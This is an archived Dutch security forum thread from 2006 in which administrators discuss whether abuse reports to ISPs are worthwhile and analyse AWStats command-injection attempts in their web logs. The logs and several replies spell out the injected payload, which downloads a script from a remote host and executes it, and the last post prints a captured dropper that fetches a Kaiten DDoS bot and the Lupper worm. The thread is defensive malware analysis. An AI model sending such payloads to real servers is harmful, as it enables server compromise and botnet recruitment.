Archief - De topics van lang geleden

Heeft het zin abuse@.. mailtjes te sturen?

29-01-2006, 16:44 door Anoniem, 15 reacties
Bijvoorbeeld:

193.193.162.71 - - [25/Jan/2006:21:57:02 +0100] "GET /awstats/awstats.pl?
configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%
2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%
2fscripz;echo%20YYY;echo| HTTP/1.1" 404 379 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
193.193.162.71 - - [25/Jan/2006:21:57:03 +0100] "GET /cgi-bin/awstats.pl?
configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%
2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%
2fscripz;echo%20YYY;echo| HTTP/1.1" 404 379 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"

Is niet echt braaf, maar 193.193.etc. is een of andere Russische bak, kan
ik me de moeite besparen?
Reacties (15)
31-01-2006, 12:29 door Jeroen Wijnands
Rusland is meestal niet de moeite tenzij je uit de ripe data
de indruk krijgt dat het een klein bedrijfje is.
31-01-2006, 14:46 door SirDice
da's een worm trouwens.. En ja, gewoon een abuse email sturen.. Als ze er genoeg krijgen gaan ze vanzelf actie ondernemen.. Als iedereen denkt: "Het heeft toch geen zin" en vervolgens niets stuurt zal er ook nooit iets aan gedaan
worden.

Meestal heeft een ISP een netblock van een nog grotere ISP (peering). Die zou je ook kunnen CC'en.
20-02-2006, 16:04 door Anoniem
Een met Pluppi.B besmette Linux doos, ik zie er een paar honderd per dag
op ons bedrijfsdomein voorbij komen.
Komt binnen via UDP poort 7555, dus goeie firewall zou het al moeten
stoppen en is alleen gevaarlijk voor mensen die een eigen webserver
draaien.
20-02-2006, 16:45 door SirDice
Een met Pluppi.B besmette Linux doos,
Welke virusscanner ziet 'm als Pluppi? Ik kan er helemaal niets over vinden.
Komt binnen via UDP poort 7555, dus goeie firewall zou het al moeten stoppen en is alleen gevaarlijk voor mensen die een eigen webserver draaien.
Als je goed kijkt dan zie je dat ze binnenkomen via tcp poort 80.. Gewoon een command injection.. De commando's zijn: | echo; echo YYY; cd /tmp; wget
1.2.3.4/scriptz; chmod +x scriptz; ./scriptz; echo YYY; echo |


Een firewall heeft dus geen zin want ik neem aan dat je je website online wilt houden...
20-02-2006, 17:21 door Virtal
Door SirDice
Een met Pluppi.B besmette Linux doos,
Welke virusscanner ziet 'm als Pluppi? Ik kan er helemaal
niets over vinden.
http://www.virusalert.nl/?show=virus&id=1243&name=Linux.Plupii.B
20-02-2006, 17:32 door SirDice
Ah... Lupii... Maar die is het dus niet... Kijk maar hoe Lupii awstats exploit..
http://www.securityfocus.com/bid/10950/exploit
Dat gebeurd dus wezenlijk anders dan wat hier gepost is...

NB Lupii komt niet binnen via UDP 7555 maar een geinfecteerde doos verzend een signaal over die poort..
20-02-2006, 19:17 door Anoniem
Wat ik hier vreend vind .... ze zeggen dat het een Linux
virus is, maar bij de verwijder instructies staan
instructies voor verschillende M$ spullen ... ikke nie snap :-)
20-02-2006, 20:10 door Virtal
Dat gebeurd dus wezenlijk anders dan wat hier gepost
is...
Dat gaf je inderdaad eerder aan.

Deze methode | echo; echo YYY; cd /tmp; wget
infected_ip/vervelende_code; chmod +x
vervelende_code; ./vervelende_code; echo YYY;
echo |
duikt sinds begin november vorig jaar in logfiles
op waarbij het IP en de tenaamstelling van de vervelende
code varieert.
20-02-2006, 22:50 door Anoniem
Jongens, jullie vergeten toch niet af en toe contact met
onze aarde te maken he? blieb blieb? Poes moet eten,
boodschappen doen, je weet wel. Lees ook af en toe eens een
gedicht. Of sta eens vroeg op om te zien hoe majestueus de
zon iedere ochtend weer opkomt en vraag verkering aan dat
leuke meisje van de overkant (voordat je helemaal verloren
gaat aan de kompjoeter)
21-02-2006, 09:55 door SirDice
Anon: Samen met m'n vriendin hebben we 8 poezen, 2 honden en 3 kippen.. Die krijgen altijd netjes op tijd eten.. Gedichten maak ik zelf (voor m'n vriendin).. De ijskast staat vol met lekkere dingen.. En ik zie liever een zonsondergang...

Maar dit soort dingen zijn gewoon leuk.. Beetje jagen op malware. Dat is iets wat ik al zo'n 20 jaar doe waarvan inmiddels al zo'n 10 jaar professioneel.. Noem het beroepsverdwazing..

Door Vital
duikt sinds begin november vorig jaar in logfiles op waarbij het IP en de tenaamstelling van de vervelende code varieert.
Ja, ik zie 'm ook regelmatig.. IP en script (progje?) veranderd inderdaad wel eens.. Jammer genoeg nog steeds dat ding niet te pakken kunnen krijgen.. Da's jammer want ik wil 'm ontleden..
21-02-2006, 11:07 door Anoniem
Door SirDice
Maar dit soort dingen zijn gewoon leuk.. Beetje jagen op malware. Dat is
iets wat ik al zo'n 20 jaar doe waarvan inmiddels al zo'n 10 jaar
professioneel.. Noem het beroepsverdwazing..

Hoe groot is jouw malware zoo ? :-)

AS
21-02-2006, 11:11 door Virtal
Ja, ik zie 'm ook regelmatig.. IP en script (progje?)
veranderd inderdaad wel eens.. Jammer genoeg nog steeds dat
ding niet te pakken kunnen krijgen.. Da's jammer want ik wil
'm ontleden..
Ik krijg het ding ook niet 'met de
hand' te pakken omdat bijvoorbeeld de systemen waar het
vandaan zou moeten komen veelal onbereikbaar zijn (time-out).
Je kunt bijvoorbeeld de errorhandler aanpassen zodat je kan detecteren wanneer je de 'aandacht' ervan hebt en het dan gecontroleerd automatisch kunt proberen te downloaden in quarantaine.

Daarnaast kan Anoniem gerust zijn. Voor dit werk hoef je
niet uit het heelal te komen. Het is mensenwerk.
26-02-2006, 20:53 door Anoniem
Ik werk met blackice server protection (ISS), heb homeserver
met win xp en jah ik ben al gestopt met het bannen van
ranges, het is niet bij te houden, elke dag probeert wel
iemand deze worm uit te voeren (ze komen van overal, nl, be,
..), en je hebt er nog andere, en ze doen niet eens de
moeite om te kijken of ik awstats bijvoorbeeld wel heb ...
27-02-2006, 17:32 door SirDice
Het bannen van ranges is iets anders dan het mailen naar een abuse mailbox..

En waarom zou een worm de moeite nemen om te controleren of je awstats hebt of niet? Het is gewoon fire 'n forget.. Als een server vatbaar is zie je 'm vanzelf wel op een, vooraf ingesteld, IRC kanaal verschijnen..
16-03-2006, 14:35 door SirDice
Update.. Heb eindelijk het bestandje te pakken wat met wget binnen gehaalt wordt.. Het script heet, in deze 'versie', cacti (ip adres is verwijderd door mij):
#!/bin/bash
wget x.x.x.x/foc
chmod 744 foc
./foc
wget x.x.x.x/iron
chmod 744 iron
./iron
foc is een Kaiten DDoS botje en logt in op IRC (undernet). Iron wordt gedetecteerd door m'n McAfee als Linux/Lupper.worm.b. Het script werkt overigens niet op FreeBSD aangezien die niet standaard is voorzien van bash en wget. Als bash wel is geinstalleerd dan staat deze, op FreeBSD, onder /usr/local/bin/bash. De executables (foc&iron) zijn Linux ELF executables en werken ook niet onder FreeBSD (tenzij je de Linux compatibiliteit aanzet).
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.